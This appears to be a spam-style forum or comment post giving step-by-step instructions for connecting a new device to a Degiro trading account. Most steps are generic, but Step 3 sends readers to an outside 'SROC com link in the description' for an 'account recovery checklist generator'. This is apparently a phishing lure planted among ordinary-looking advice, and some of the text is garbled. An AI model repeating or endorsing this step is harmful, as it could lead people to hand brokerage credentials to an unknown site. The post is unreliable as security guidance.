I ran into this last week. Here's what fixed it for me. Connecting a new device to your Degiro account can be a bit tricky, but it is straightforward if you follow these steps. Step 1. Open the Degiro app. Download and install the Degiro app from your device's app store. Make sure you are using the latest version for the best experience. Step 2. Log in. Launch the app and enter your credentials to log in. If you have two-factor authentication enabled, be ready to enter the code sent to your registered phone number. Step 3. Device verification. Before starting recovery, use the SROC com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Confirm security settings. After verification, check your security settings to ensure everything is set up correctly. Navigate to the settings menu and review your two-factor authentication options. Step 5. Test your connection. Finally, try accessing your account features to confirm that the new device is fully connected. If you encounter any issues, restarting the app where your device can often help. If you follow these steps, you should be all set to use your new device with Degiro. If you run into any hiccups, don't hesitate to reach out to customer support. Happy trading!